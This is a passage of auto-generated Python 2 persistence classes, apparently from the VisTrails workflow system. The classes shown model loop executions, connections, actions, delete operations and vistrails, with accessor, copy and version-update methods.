db_completed = property(__get_db_completed, __set_db_completed)
def db_add_completed(self, completed):
self._db_completed = completed
def db_change_completed(self, completed):
self._db_completed = completed
def db_delete_completed(self, completed):
self._db_completed = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def getPrimaryKey(self):
return self._db_id
class DBLoopExec(object):
vtType = 'loop_exec'
def __init__(self, id=None, ts_start=None, ts_end=None, completed=None, error=None, module_execs=None, group_execs=None):
self._db_id = id
self._db_ts_start = ts_start
self._db_ts_end = ts_end
self._db_completed = completed
self._db_error = error
self.db_deleted_module_execs = []
self.db_module_execs_id_index = {}
if module_execs is None:
self._db_module_execs = []
else:
self._db_module_execs = module_execs
for v in self._db_module_execs:
self.db_module_execs_id_index[v.db_id] = v
self.db_deleted_group_execs = []
self.db_group_execs_id_index = {}
if group_execs is None:
self._db_group_execs = []
else:
self._db_group_execs = group_execs
for v in self._db_group_execs:
self.db_group_execs_id_index[v.db_id] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBLoopExec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBLoopExec(id=self._db_id,
ts_start=self._db_ts_start,
ts_end=self._db_ts_end,
completed=self._db_completed,
error=self._db_error)
if self._db_module_execs is None:
cp._db_module_execs = []
else:
cp._db_module_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_module_execs]
if self._db_group_execs is None:
cp._db_group_execs = []
else:
cp._db_group_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_group_execs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_module_execs_id_index = dict((v.db_id, v) for v in cp._db_module_execs)
cp.db_group_execs_id_index = dict((v.db_id, v) for v in cp._db_group_execs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBLoopExec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ts_start' in class_dict:
res = class_dict['ts_start'](old_obj, trans_dict)
new_obj.db_ts_start = res
elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
new_obj.db_ts_start = old_obj.db_ts_start
if 'ts_end' in class_dict:
res = class_dict['ts_end'](old_obj, trans_dict)
new_obj.db_ts_end = res
elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
new_obj.db_ts_end = old_obj.db_ts_end
if 'completed' in class_dict:
res = class_dict['completed'](old_obj, trans_dict)
new_obj.db_completed = res
elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
new_obj.db_completed = old_obj.db_completed
if 'error' in class_dict:
res = class_dict['error'](old_obj, trans_dict)
new_obj.db_error = res
elif hasattr(old_obj, 'db_error') and old_obj.db_error is not None:
new_obj.db_error = old_obj.db_error
if 'module_execs' in class_dict:
res = class_dict['module_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_module_exec(obj)
elif hasattr(old_obj, 'db_module_execs') and old_obj.db_module_execs is not None:
for obj in old_obj.db_module_execs:
new_obj.db_add_module_exec(DBModuleExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_module_execs') and hasattr(new_obj, 'db_deleted_module_execs'):
for obj in old_obj.db_deleted_module_execs:
n_obj = DBModuleExec.update_version(obj, trans_dict)
new_obj.db_deleted_module_execs.append(n_obj)
if 'group_execs' in class_dict:
res = class_dict['group_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_group_exec(obj)
elif hasattr(old_obj, 'db_group_execs') and old_obj.db_group_execs is not None:
for obj in old_obj.db_group_execs:
new_obj.db_add_group_exec(DBGroupExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_group_execs') and hasattr(new_obj, 'db_deleted_group_execs'):
for obj in old_obj.db_deleted_group_execs:
n_obj = DBGroupExec.update_version(obj, trans_dict)
new_obj.db_deleted_group_execs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_module_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_module_exec(child)
to_del = []
for child in self.db_group_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_group_exec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_module_execs)
children.extend(self.db_deleted_group_execs)
if remove:
self.db_deleted_module_execs = []
self.db_deleted_group_execs = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_module_execs:
if child.has_changes():
return True
for child in self._db_group_execs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_ts_start(self):
return self._db_ts_start
def __set_db_ts_start(self, ts_start):
self._db_ts_start = ts_start
self.is_dirty = True
db_ts_start = property(__get_db_ts_start, __set_db_ts_start)
def db_add_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_change_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_delete_ts_start(self, ts_start):
self._db_ts_start = None
def __get_db_ts_end(self):
return self._db_ts_end
def __set_db_ts_end(self, ts_end):
self._db_ts_end = ts_end
self.is_dirty = True
db_ts_end = property(__get_db_ts_end, __set_db_ts_end)
def db_add_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_change_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_delete_ts_end(self, ts_end):
self._db_ts_end = None
def __get_db_completed(self):
return self._db_completed
def __set_db_completed(self, completed):
self._db_completed = completed
self.is_dirty = True
db_completed = property(__get_db_completed, __set_db_completed)
def db_add_completed(self, completed):
self._db_completed = completed
def db_change_completed(self, completed):
self._db_completed = completed
def db_delete_completed(self, completed):
self._db_completed = None
def __get_db_error(self):
return self._db_error
def __set_db_error(self, error):
self._db_error = error
self.is_dirty = True
db_error = property(__get_db_error, __set_db_error)
def db_add_error(self, error):
self._db_error = error
def db_change_error(self, error):
self._db_error = error
def db_delete_error(self, error):
self._db_error = None
def __get_db_module_execs(self):
return self._db_module_execs
def __set_db_module_execs(self, module_execs):
self._db_module_execs = module_execs
self.is_dirty = True
db_module_execs = property(__get_db_module_execs, __set_db_module_execs)
def db_get_module_execs(self):
return self._db_module_execs
def db_add_module_exec(self, module_exec):
self.is_dirty = True
self._db_module_execs.append(module_exec)
self.db_module_execs_id_index[module_exec.db_id] = module_exec
def db_change_module_exec(self, module_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == module_exec.db_id:
self._db_module_execs[i] = module_exec
found = True
break
if not found:
self._db_module_execs.append(module_exec)
self.db_module_execs_id_index[module_exec.db_id] = module_exec
def db_delete_module_exec(self, module_exec):
self.is_dirty = True
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == module_exec.db_id:
if not self._db_module_execs[i].is_new:
self.db_deleted_module_execs.append(self._db_module_execs[i])
del self._db_module_execs[i]
break
del self.db_module_execs_id_index[module_exec.db_id]
def db_get_module_exec(self, key):
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == key:
return self._db_module_execs[i]
return None
def db_get_module_exec_by_id(self, key):
return self.db_module_execs_id_index[key]
def db_has_module_exec_with_id(self, key):
return key in self.db_module_execs_id_index
def __get_db_group_execs(self):
return self._db_group_execs
def __set_db_group_execs(self, group_execs):
self._db_group_execs = group_execs
self.is_dirty = True
db_group_execs = property(__get_db_group_execs, __set_db_group_execs)
def db_get_group_execs(self):
return self._db_group_execs
def db_add_group_exec(self, group_exec):
self.is_dirty = True
self._db_group_execs.append(group_exec)
self.db_group_execs_id_index[group_exec.db_id] = group_exec
def db_change_group_exec(self, group_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == group_exec.db_id:
self._db_group_execs[i] = group_exec
found = True
break
if not found:
self._db_group_execs.append(group_exec)
self.db_group_execs_id_index[group_exec.db_id] = group_exec
def db_delete_group_exec(self, group_exec):
self.is_dirty = True
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == group_exec.db_id:
if not self._db_group_execs[i].is_new:
self.db_deleted_group_execs.append(self._db_group_execs[i])
del self._db_group_execs[i]
break
del self.db_group_execs_id_index[group_exec.db_id]
def db_get_group_exec(self, key):
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == key:
return self._db_group_execs[i]
return None
def db_get_group_exec_by_id(self, key):
return self.db_group_execs_id_index[key]
def db_has_group_exec_with_id(self, key):
return key in self.db_group_execs_id_index
def getPrimaryKey(self):
return self._db_id
class DBConnection(object):
vtType = 'connection'
def __init__(self, id=None, ports=None):
self._db_id = id
self.db_deleted_ports = []
self.db_ports_id_index = {}
self.db_ports_type_index = {}
if ports is None:
self._db_ports = []
else:
self._db_ports = ports
for v in self._db_ports:
self.db_ports_id_index[v.db_id] = v
self.db_ports_type_index[v.db_type] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBConnection.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBConnection(id=self._db_id)
if self._db_ports is None:
cp._db_ports = []
else:
cp._db_ports = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_ports]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_ports_id_index = dict((v.db_id, v) for v in cp._db_ports)
cp.db_ports_type_index = dict((v.db_type, v) for v in cp._db_ports)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBConnection()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ports' in class_dict:
res = class_dict['ports'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_port(obj)
elif hasattr(old_obj, 'db_ports') and old_obj.db_ports is not None:
for obj in old_obj.db_ports:
new_obj.db_add_port(DBPort.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_ports') and hasattr(new_obj, 'db_deleted_ports'):
for obj in old_obj.db_deleted_ports:
n_obj = DBPort.update_version(obj, trans_dict)
new_obj.db_deleted_ports.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_ports:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_port(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_ports)
if remove:
self.db_deleted_ports = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_ports:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_ports(self):
return self._db_ports
def __set_db_ports(self, ports):
self._db_ports = ports
self.is_dirty = True
db_ports = property(__get_db_ports, __set_db_ports)
def db_get_ports(self):
return self._db_ports
def db_add_port(self, port):
self.is_dirty = True
self._db_ports.append(port)
self.db_ports_id_index[port.db_id] = port
self.db_ports_type_index[port.db_type] = port
def db_change_port(self, port):
self.is_dirty = True
found = False
for i in xrange(len(self._db_ports)):
if self._db_ports[i].db_id == port.db_id:
self._db_ports[i] = port
found = True
break
if not found:
self._db_ports.append(port)
self.db_ports_id_index[port.db_id] = port
self.db_ports_type_index[port.db_type] = port
def db_delete_port(self, port):
self.is_dirty = True
for i in xrange(len(self._db_ports)):
if self._db_ports[i].db_id == port.db_id:
if not self._db_ports[i].is_new:
self.db_deleted_ports.append(self._db_ports[i])
del self._db_ports[i]
break
del self.db_ports_id_index[port.db_id]
del self.db_ports_type_index[port.db_type]
def db_get_port(self, key):
for i in xrange(len(self._db_ports)):
if self._db_ports[i].db_id == key:
return self._db_ports[i]
return None
def db_get_port_by_id(self, key):
return self.db_ports_id_index[key]
def db_has_port_with_id(self, key):
return key in self.db_ports_id_index
def db_get_port_by_type(self, key):
return self.db_ports_type_index[key]
def db_has_port_with_type(self, key):
return key in self.db_ports_type_index
def getPrimaryKey(self):
return self._db_id
class DBAction(object):
vtType = 'action'
def __init__(self, operations=None, id=None, prevId=None, date=None, session=None, user=None, prune=None, annotations=None):
self.db_deleted_operations = []
self.db_operations_id_index = {}
if operations is None:
self._db_operations = []
else:
self._db_operations = operations
for v in self._db_operations:
self.db_operations_id_index[v.db_id] = v
self._db_id = id
self._db_prevId = prevId
self._db_date = date
self._db_session = session
self._db_user = user
self._db_prune = prune
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
self.db_annotations_key_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_annotations_key_index[v.db_key] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBAction.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBAction(id=self._db_id,
prevId=self._db_prevId,
date=self._db_date,
session=self._db_session,
user=self._db_user,
prune=self._db_prune)
if self._db_operations is None:
cp._db_operations = []
else:
cp._db_operations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_operations]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_prevId') and ('action', self._db_prevId) in id_remap:
cp._db_prevId = id_remap[('action', self._db_prevId)]
# recreate indices and set flags
cp.db_operations_id_index = dict((v.db_id, v) for v in cp._db_operations)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_annotations_key_index = dict((v.db_key, v) for v in cp._db_annotations)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBAction()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'operations' in class_dict:
res = class_dict['operations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_operation(obj)
elif hasattr(old_obj, 'db_operations') and old_obj.db_operations is not None:
for obj in old_obj.db_operations:
if obj.vtType == 'add':
new_obj.db_add_operation(DBAdd.update_version(obj, trans_dict))
elif obj.vtType == 'delete':
new_obj.db_add_operation(DBDelete.update_version(obj, trans_dict))
elif obj.vtType == 'change':
new_obj.db_add_operation(DBChange.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_operations') and hasattr(new_obj, 'db_deleted_operations'):
for obj in old_obj.db_deleted_operations:
if obj.vtType == 'add':
n_obj = DBAdd.update_version(obj, trans_dict)
new_obj.db_deleted_operations.append(n_obj)
elif obj.vtType == 'delete':
n_obj = DBDelete.update_version(obj, trans_dict)
new_obj.db_deleted_operations.append(n_obj)
elif obj.vtType == 'change':
n_obj = DBChange.update_version(obj, trans_dict)
new_obj.db_deleted_operations.append(n_obj)
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'prevId' in class_dict:
res = class_dict['prevId'](old_obj, trans_dict)
new_obj.db_prevId = res
elif hasattr(old_obj, 'db_prevId') and old_obj.db_prevId is not None:
new_obj.db_prevId = old_obj.db_prevId
if 'date' in class_dict:
res = class_dict['date'](old_obj, trans_dict)
new_obj.db_date = res
elif hasattr(old_obj, 'db_date') and old_obj.db_date is not None:
new_obj.db_date = old_obj.db_date
if 'session' in class_dict:
res = class_dict['session'](old_obj, trans_dict)
new_obj.db_session = res
elif hasattr(old_obj, 'db_session') and old_obj.db_session is not None:
new_obj.db_session = old_obj.db_session
if 'user' in class_dict:
res = class_dict['user'](old_obj, trans_dict)
new_obj.db_user = res
elif hasattr(old_obj, 'db_user') and old_obj.db_user is not None:
new_obj.db_user = old_obj.db_user
if 'prune' in class_dict:
res = class_dict['prune'](old_obj, trans_dict)
new_obj.db_prune = res
elif hasattr(old_obj, 'db_prune') and old_obj.db_prune is not None:
new_obj.db_prune = old_obj.db_prune
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
to_del = []
for child in self.db_operations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_operation(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_annotations)
children.extend(self.db_deleted_operations)
if remove:
self.db_deleted_annotations = []
self.db_deleted_operations = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_annotations:
if child.has_changes():
return True
for child in self._db_operations:
if child.has_changes():
return True
return False
def __get_db_operations(self):
return self._db_operations
def __set_db_operations(self, operations):
self._db_operations = operations
self.is_dirty = True
db_operations = property(__get_db_operations, __set_db_operations)
def db_get_operations(self):
return self._db_operations
def db_add_operation(self, operation):
self.is_dirty = True
self._db_operations.append(operation)
self.db_operations_id_index[operation.db_id] = operation
def db_change_operation(self, operation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_operations)):
if self._db_operations[i].db_id == operation.db_id:
self._db_operations[i] = operation
found = True
break
if not found:
self._db_operations.append(operation)
self.db_operations_id_index[operation.db_id] = operation
def db_delete_operation(self, operation):
self.is_dirty = True
for i in xrange(len(self._db_operations)):
if self._db_operations[i].db_id == operation.db_id:
if not self._db_operations[i].is_new:
self.db_deleted_operations.append(self._db_operations[i])
del self._db_operations[i]
break
del self.db_operations_id_index[operation.db_id]
def db_get_operation(self, key):
for i in xrange(len(self._db_operations)):
if self._db_operations[i].db_id == key:
return self._db_operations[i]
return None
def db_get_operation_by_id(self, key):
return self.db_operations_id_index[key]
def db_has_operation_with_id(self, key):
return key in self.db_operations_id_index
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_prevId(self):
return self._db_prevId
def __set_db_prevId(self, prevId):
self._db_prevId = prevId
self.is_dirty = True
db_prevId = property(__get_db_prevId, __set_db_prevId)
def db_add_prevId(self, prevId):
self._db_prevId = prevId
def db_change_prevId(self, prevId):
self._db_prevId = prevId
def db_delete_prevId(self, prevId):
self._db_prevId = None
def __get_db_date(self):
return self._db_date
def __set_db_date(self, date):
self._db_date = date
self.is_dirty = True
db_date = property(__get_db_date, __set_db_date)
def db_add_date(self, date):
self._db_date = date
def db_change_date(self, date):
self._db_date = date
def db_delete_date(self, date):
self._db_date = None
def __get_db_session(self):
return self._db_session
def __set_db_session(self, session):
self._db_session = session
self.is_dirty = True
db_session = property(__get_db_session, __set_db_session)
def db_add_session(self, session):
self._db_session = session
def db_change_session(self, session):
self._db_session = session
def db_delete_session(self, session):
self._db_session = None
def __get_db_user(self):
return self._db_user
def __set_db_user(self, user):
self._db_user = user
self.is_dirty = True
db_user = property(__get_db_user, __set_db_user)
def db_add_user(self, user):
self._db_user = user
def db_change_user(self, user):
self._db_user = user
def db_delete_user(self, user):
self._db_user = None
def __get_db_prune(self):
return self._db_prune
def __set_db_prune(self, prune):
self._db_prune = prune
self.is_dirty = True
db_prune = property(__get_db_prune, __set_db_prune)
def db_add_prune(self, prune):
self._db_prune = prune
def db_change_prune(self, prune):
self._db_prune = prune
def db_delete_prune(self, prune):
self._db_prune = None
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
del self.db_annotations_key_index[annotation.db_key]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def db_get_annotation_by_key(self, key):
return self.db_annotations_key_index[key]
def db_has_annotation_with_key(self, key):
return key in self.db_annotations_key_index
def getPrimaryKey(self):
return self._db_id
class DBDelete(object):
vtType = 'delete'
def __init__(self, id=None, what=None, objectId=None, parentObjId=None, parentObjType=None):
self._db_id = id
self._db_what = what
self._db_objectId = objectId
self._db_parentObjId = parentObjId
self._db_parentObjType = parentObjType
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBDelete.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBDelete(id=self._db_id,
what=self._db_what,
objectId=self._db_objectId,
parentObjId=self._db_parentObjId,
parentObjType=self._db_parentObjType)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_objectId') and (self._db_what, self._db_objectId) in id_remap:
cp._db_objectId = id_remap[(self._db_what, self._db_objectId)]
if hasattr(self, 'db_parentObjId') and (self._db_parentObjType, self._db_parentObjId) in id_remap:
cp._db_parentObjId = id_remap[(self._db_parentObjType, self._db_parentObjId)]
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBDelete()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'what' in class_dict:
res = class_dict['what'](old_obj, trans_dict)
new_obj.db_what = res
elif hasattr(old_obj, 'db_what') and old_obj.db_what is not None:
new_obj.db_what = old_obj.db_what
if 'objectId' in class_dict:
res = class_dict['objectId'](old_obj, trans_dict)
new_obj.db_objectId = res
elif hasattr(old_obj, 'db_objectId') and old_obj.db_objectId is not None:
new_obj.db_objectId = old_obj.db_objectId
if 'parentObjId' in class_dict:
res = class_dict['parentObjId'](old_obj, trans_dict)
new_obj.db_parentObjId = res
elif hasattr(old_obj, 'db_parentObjId') and old_obj.db_parentObjId is not None:
new_obj.db_parentObjId = old_obj.db_parentObjId
if 'parentObjType' in class_dict:
res = class_dict['parentObjType'](old_obj, trans_dict)
new_obj.db_parentObjType = res
elif hasattr(old_obj, 'db_parentObjType') and old_obj.db_parentObjType is not None:
new_obj.db_parentObjType = old_obj.db_parentObjType
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_what(self):
return self._db_what
def __set_db_what(self, what):
self._db_what = what
self.is_dirty = True
db_what = property(__get_db_what, __set_db_what)
def db_add_what(self, what):
self._db_what = what
def db_change_what(self, what):
self._db_what = what
def db_delete_what(self, what):
self._db_what = None
def __get_db_objectId(self):
return self._db_objectId
def __set_db_objectId(self, objectId):
self._db_objectId = objectId
self.is_dirty = True
db_objectId = property(__get_db_objectId, __set_db_objectId)
def db_add_objectId(self, objectId):
self._db_objectId = objectId
def db_change_objectId(self, objectId):
self._db_objectId = objectId
def db_delete_objectId(self, objectId):
self._db_objectId = None
def __get_db_parentObjId(self):
return self._db_parentObjId
def __set_db_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
self.is_dirty = True
db_parentObjId = property(__get_db_parentObjId, __set_db_parentObjId)
def db_add_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_change_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_delete_parentObjId(self, parentObjId):
self._db_parentObjId = None
def __get_db_parentObjType(self):
return self._db_parentObjType
def __set_db_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
self.is_dirty = True
db_parentObjType = property(__get_db_parentObjType, __set_db_parentObjType)
def db_add_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_change_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_delete_parentObjType(self, parentObjType):
self._db_parentObjType = None
def getPrimaryKey(self):
return self._db_id
class DBVistrail(object):
vtType = 'vistrail'
def __init__(self, id=None, entity_type=None, version=None, name=None, last_modified=None, actions=None, tags=None, annotations=None):
self._db_id = id
self._db_entity_type = entity_type
self._db_version = version
self._db_name = name
self._db_last_modified = last_modified
self.db_deleted_actions = []
self.db_actions_id_index = {}
if actions is None:
self._db_actions = []
else:
self._db_actions = actions
for v in self._db_actions:
self.db_actions_id_index[v.db_id] = v
self.db_deleted_tags = []
self.db_tags_id_index = {}
self.db_tags_name_index = {}
if tags is None:
self._db_tags = []
else:
self._db_tags = tags
for v in self._db_tags:
self.db_tags_id_index[v.db_id] = v
self.db_tags_name_index[v.db_name] = v
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
self.db_annotations_key_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_annotations_key_index[v.db_key] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBVistrail.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBVistrail(id=self._db_id,
entity_type=self._db_entity_type,
version=self._db_version,
name=self._db_name,
last_modified=self._db_last_modified)
if self._db_actions is None:
cp._db_actions = []
else:
cp._db_actions = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_actions]
if self._db_tags is None:
cp._db_tags = []
else:
cp._db_tags = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_tags]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
# set new ids
if new_ids:
